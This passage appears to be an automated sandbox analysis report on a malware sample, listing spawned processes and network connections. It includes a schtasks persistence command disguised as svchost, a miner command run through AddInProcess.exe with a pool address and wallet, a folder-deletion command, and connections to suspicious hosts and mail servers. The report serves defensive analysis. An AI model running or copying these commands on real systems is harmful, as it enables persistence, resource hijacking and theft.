PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\600E.tmp\600F.tmp\6010.bat C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c6e8cc40,0x7ff9c6e8cc4c,0x7ff9c6e8cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff9c6d446f8,0x7ff9c6d44708,0x7ff9c6d44718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {156e0aec-bca6-4f94-a198-ba3136a75a97} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2260 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2392 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00c11624-cd53-4f2c-b62e-40a4e3bf8ee1} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1448 -childID 1 -isForBrowser -prefsHandle 2628 -prefMapHandle 2872 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a70bca7-0a2b-4c7a-913f-74b68ceb9488} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1308 -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 2956 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3a880cb-bb4f-4dc2-b9c9-ec225add4fbc} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4180 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4128 -prefMapHandle 4164 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49c5470e-98b9-449c-a346-010d520141d7} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" utility

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 3 -isForBrowser -prefsHandle 5432 -prefMapHandle 5372 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fda17f0-70c8-4bfb-a81c-51c26cf43076} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 4 -isForBrowser -prefsHandle 5568 -prefMapHandle 5432 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ef5b24b-4793-477c-9b6e-c2cf8a66ecd3} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5748 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {628cb62d-0bdc-463f-8abf-d03bea636aed} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\1000029002\e378e7234d.exe

"C:\Users\Admin\1000029002\e378e7234d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5556 -ip 5556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1116

C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe

"C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

clamer.exe -priverdD

C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"

C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\ProgramData\kcsnc\glhe.exe

C:\ProgramData\kcsnc\glhe.exe

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe

"C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 71261C620F8E184C4A94934EE9CCDB8E

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 382CA91FCAA1BC78776CDC3148915326 E Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && "C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && rmdir /S /Q DLLs Lib"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=220,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1936 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
RU 185.215.113.19:80 185.215.113.19 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 216.58.214.174:443 www.youtube.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
FR 216.58.214.78:443 www.youtube.com tcp
FR 216.58.214.78:443 www.youtube.com tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
FR 216.58.214.174:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 174.214.58.216.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
FR 216.58.214.78:443 youtube-ui.l.google.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 78.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com udp
N/A 127.0.0.1:57307 tcp
FR 172.217.20.196:443 www.google.com tcp
FR 172.217.20.196:443 www.google.com tcp
N/A 127.0.0.1:57322 tcp
N/A 224.0.0.251:5353 udp
RU 85.28.47.31:80 85.28.47.31 tcp
US 8.8.8.8:53 31.47.28.85.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 216.58.214.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 216.58.214.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.233:443 r4---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.233:443 r4.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 233.168.125.74.in-addr.arpa udp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 111.240.92.91.in-addr.arpa udp
NL 91.92.240.111:1334 91.92.240.111 tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 174.201.250.142.in-addr.arpa udp
FR 142.250.201.174:443 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
FR 142.250.201.174:443 play.google.com tcp
NL 91.92.240.111:80 91.92.240.111 tcp
CH 185.196.9.187:80 185.196.9.187 tcp
US 8.8.8.8:53 187.9.196.185.in-addr.arpa udp
CA 51.222.21.20:4782 tcp
US 8.8.8.8:53 ipwho.is udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 20.21.222.51.in-addr.arpa udp
DE 195.201.57.90:443 ipwho.is tcp
NL 91.92.240.111:39001 tcp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
NL 185.43.220.45:4000 claywyaeropumps.com tcp
NL 185.43.220.45:4376 claywyaeropumps.com tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 smtp.gmail.com udp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 8.8.8.8:53 108.193.125.74.in-addr.arpa udp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 8.8.8.8:53 cardinalhealth.com udp
US 35.186.192.226:587 cardinalhealth.com tcp
US 8.8.8.8:53 smtp.tim.it udp
NL 34.141.221.156:587 smtp.tim.it tcp
US 8.8.8.8:53 store.steampowered.com udp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 136.193.25.184.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
GB 184.25.193.136:443 store.steampowered.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 imap.lycos.de udp
US 8.8.8.8:53 smtp.mail.yahoo.com udp
IE 87.248.97.36:465 smtp.mail.yahoo.com tcp
US 209.202.254.90:587 imap.lycos.de tcp
US 8.8.8.8:53 smtp.laposte.net udp
FR 160.92.124.65:465 smtp.laposte.net tcp
US 8.8.8.8:53 36.97.248.87.in-addr.arpa udp
IE 74.125.193.108:465 smtp.gmail.com tcp
